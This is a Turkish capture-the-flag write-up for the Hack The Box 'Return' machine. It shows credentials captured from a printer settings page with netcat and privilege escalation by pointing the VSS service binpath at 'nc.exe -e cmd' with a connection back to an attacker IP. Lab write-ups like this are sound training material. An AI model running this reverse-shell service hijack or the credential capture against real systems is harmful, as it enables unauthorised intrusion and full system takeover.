Hack The Box Return Makine Çözümü — shaggy

Açıklama: Selam arkadaşlar, Hack the Box platformunda bulunan** ‘Return’ **isimli **makinenin ** çözümünü sizinle paylaşıyor olacağım. Bu konuda Active Directory’de servislerin zararlıya kullanılması hakkında bilgileneceğiz. Çözmesi oldukça zevkli olan bu makineyi gelin çözmeye başlayalım. 🍾 🙌 🎉

Öncelikle ilgili sistem üzerinde çalışan port ve servislerin bilgilerini öğreniyoruz.

Sonrasında smb’lerden ek bilgi edinmek üzere bakınıyoruz.

Ardından sistem üzerinde bulunan web uygulamasına gittiğimizde bizi yazıcı arayüzü karşılamakta olduğunu görüyoruz.

Burada isteği kontrol ederken uygulamanın sadece ip fonksiyonunu gönderdiğini gördük.

Bunun üzerine kendi ip’mizi siteme verdiğimizde ve nc ile dinlediğimizde bize parola verdiğini gördük.

Gerekli credentialları elde ettiğimiz üzere sisteme bağlantı sağlayabiliriz.Bunun üzerinde svc-printer kullanıcısının Desktop dizinine gidip user.txt’yi alabiliriz.

Privilege escalation’a başlamadan önce kullanıcımızın hangi ayrıcalıklara sahip olduğumu öğrenelim.

Sonrasında sistem üzerinde çalışan servisleri kontrol edelim. Burada VSS hizmetinin açık olduğunu fark ediyoruz.

1*Evil-WinRM* PS C:\Users\svc-printer\desktop> servicesPath                                                                              Privileges Service          ----                                                                              ---------- -------          C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe                         True       ADWS             C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe                     True       NetTcpPortSharingC:\Windows\SysWow64\perfhost.exe                                                  True       PerfHost         "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"        False      Sense            C:\Windows\servicing\TrustedInstaller.exe                                         False      TrustedInstaller "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"            True       VGAuthService    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"                               True       VMTools          "C:\WINDOWS\system32\vssvc.exe"                                                   True       VSS              "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe"    True       WdNisSvc         "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe"   True       WinDefend        "C:\Program Files\Windows Media Player\wmpnetwk.exe"                              False      WMPNetworkSvc

Sistem üzerine netcat yüklüyoruz.

Ardından VSS servisini kendi belirlediğimiz nc adresinden dinleyerek yönlendiriyoruz. Burada sadece yönlendirmemiz yetmiyor servisi durdurup tekrardan aktif etmemiz gerekiyor.

sc.exe config VSS binpath=”C:\Users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.13 443"

Sonrasında sisteme verdiğimiz porttan Shell’imiz geliyor ve burada dikkat edilmesi gereken bir diğer husus ise 40 saniye gibi bir sürede servisin aktif olması. Sonrasında servis duracaktır. Bunun üzerinde root.txt’yi almak için 40 saniye gibi bir zaman diliminiz mevcut. :D

Okuduğunuz için teşekkürler, iyi çalışmalar dilerim. :)